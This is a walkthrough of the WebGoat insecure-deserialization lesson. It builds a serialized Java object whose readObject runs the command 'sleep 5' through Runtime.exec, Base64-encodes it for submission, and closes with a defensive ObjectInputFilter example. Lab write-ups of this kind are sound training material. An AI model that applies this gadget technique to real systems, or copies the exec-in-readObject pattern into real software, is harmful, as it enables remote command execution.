Try to change this serialized object in order to delay the page response for exactly 5 seconds.
Solution
Hints: WebGoat probably contains the org.dummy.insecure.framework.VulnerableTaskHolder class as shown on the lesson pages. Use this to construct and serialize your attack. The VulnerableTaskHolder might have been updated on the server with the next version number. Not all actions are allowed anymore. The readObject has been changed. For serializing it does not affect the data. Follow the additional hints from the feedback on your attempts.
To create the attack we need to follow these 4 steps: clone the code from the WebGoat repository, compile the necessary classes, run the attack to serialize the object, and convert the token to Base64. Let's break down the process:
cd WebGoat/webgoat-lessons/insecure-deserialization/src/main/java/org/owasp/webgoat/deserialization
This file contains the endpoint used by WebGoat to check your token for completing the lesson.
b) Compile the necessary classes (VulnerableTaskHolder, Attack).
Go into the VulnerableTaskHolder java file.
cd WebGoat/webgoat-lessons/insecure-deserialization/src/main/java/org/dummy/insecure/framework
package org.dummy.insecure.framework;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.ObjectInputStream;
import java.io.Serializable;
import java.time.LocalDateTime;

public class VulnerableTaskHolder implements Serializable {

    private static final long serialVersionUID = 2;

    private String taskName;
    private String taskAction;
    private LocalDateTime requestedExecutionTime;

    public VulnerableTaskHolder(String taskName, String taskAction) {
        super();
        this.taskName = taskName;
        this.taskAction = taskAction;
        this.requestedExecutionTime = LocalDateTime.now();
    }

    @Override
    public String toString() {
        return "VulnerableTaskHolder [taskName=" + taskName + ", taskAction=" + taskAction + ", requestedExecutionTime="
                + requestedExecutionTime + "]";
    }

    private void readObject(ObjectInputStream stream) throws Exception {
        stream.defaultReadObject();

        if (requestedExecutionTime != null &&
                (requestedExecutionTime.isBefore(LocalDateTime.now().minusMinutes(10))
                || requestedExecutionTime.isAfter(LocalDateTime.now()))) {
            throw new IllegalArgumentException("outdated");
        }

        if ((taskAction.startsWith("sleep") || taskAction.startsWith("ping"))
                && taskAction.length() < 22) {
            try {
                Process p = Runtime.getRuntime().exec(taskAction);
                BufferedReader in = new BufferedReader(
                        new InputStreamReader(p.getInputStream()));
                String line = null;
                while ((line = in.readLine()) != null) {
                    // log.info(line);
                }
            } catch (IOException e) {
                // log.error("IO Exception", e);
            }
        }
    }
}
Compile the file
javac VulnerableTaskHolder.java
Create and compile "Attack.java".
package org.dummy.insecure.framework;

import java.io.FileOutputStream;
import java.io.ObjectOutputStream;

public class Attack {
    public static void main(String[] args) throws Exception {
        // "sleep 5" starts with "sleep" and is shorter than 22 characters,
        // so it passes the checks in VulnerableTaskHolder.readObject.
        VulnerableTaskHolder vulnObj = new VulnerableTaskHolder("dummy", "sleep 5");

        // Write the serialized object to a file named "serial".
        FileOutputStream fos = new FileOutputStream("serial");
        ObjectOutputStream os = new ObjectOutputStream(fos);
        os.writeObject(vulnObj);
        os.close();
    }
}
Compile the "Attack.java" file
javac Attack.java
c) Run Attack.java to Generate the Serialized Object
java org.dummy.insecure.framework.Attack
d) Convert the serialized object to Base64 and submit it to complete the lesson
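Running Attack.class creates a file named serial, which must be converted to Base64 with the following PowerShell commands:
# Read the binary content of the file
# (Get-Content -Encoding Byte only works in Windows PowerShell 5.1; ReadAllBytes also works in PowerShell 6+)
$fileContent = [System.IO.File]::ReadAllBytes((Resolve-Path "serial").Path)
# Convert the binary content to a Base64 string
$base64String = [System.Convert]::ToBase64String($fileContent)
# Print the Base64 string
$base64String
Copy the Base64 token and submit it in the WebGoat lesson form to complete the exercise. Submit it within 10 minutes of generating it: readObject rejects a requestedExecutionTime older than that with "outdated".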
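
The token works because readObject runs during deserialization, before the application ever receives the object. The sketch below is an added example, not part of WebGoat or the original walkthrough: it shows the defensive counterpart, a class allow-list set with ObjectInputFilter (Java 9+) that rejects an unexpected class before its readObject is called. The class names FilteredDeserialization and SideEffectTask, the readToken helper and the filter pattern are assumptions made for this example.

```java
import java.io.*;
import java.util.Base64;

public class FilteredDeserialization {
    // Constructed stand-in for a class whose readObject has side effects.
    static class SideEffectTask implements Serializable {
        private static final long serialVersionUID = 1L;
        static boolean readObjectRan = false;
        String taskAction = "sleep 5";

        private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            readObjectRan = true; // VulnerableTaskHolder executes taskAction at this point
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(buf)) {
            out.writeObject(o);
        }
        return buf.toByteArray();
    }

    // Decode a Base64 token and deserialize it with a class filter installed first.
    static Object readToken(String token, String filterPattern) throws IOException, ClassNotFoundException {
        byte[] raw = Base64.getDecoder().decode(token);
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(raw))) {
            in.setObjectInputFilter(ObjectInputFilter.Config.createFilter(filterPattern));
            return in.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        String allowOnlyStrings = "java.lang.String;!*"; // allow String, reject every other class
        String good = Base64.getEncoder().encodeToString(serialize("hello"));
        String bad = Base64.getEncoder().encodeToString(serialize(new SideEffectTask()));

        System.out.println("allowed: " + readToken(good, allowOnlyStrings));
        try {
            readToken(bad, allowOnlyStrings);
        } catch (InvalidClassException e) {
            // The filter rejects the class descriptor, so readObject is never invoked.
            System.out.println("rejected: " + e.getMessage());
        }
        System.out.println("readObject ran: " + SideEffectTask.readObjectRan);
    }
}
```

The filter is consulted when the class descriptor is read, so the rejection happens before an instance is created; checks placed inside readObject, as in VulnerableTaskHolder, run too late to serve as the trust boundary.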